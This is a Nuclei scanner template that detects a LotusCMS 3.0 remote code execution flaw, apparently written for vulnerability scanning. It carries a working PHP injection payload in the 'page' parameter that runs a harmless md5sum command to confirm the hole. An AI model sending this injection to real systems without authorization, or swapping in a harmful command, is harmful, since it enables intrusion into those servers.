id: lotuscms-rce

info:
  name: LotusCMS 3.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call and allow remote code execution.
  reference:
    - https://github.com/Hood3dRob1n/LotusCMS-Exploit
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: lotuscms,rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/index.php"
      - "{{BaseURL}}/lcms/index.php"

    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      page=index');${system('echo lotuscms_rce | md5sum')};#

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "38ee63071a04dc5e04ed22624c38e648"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/30
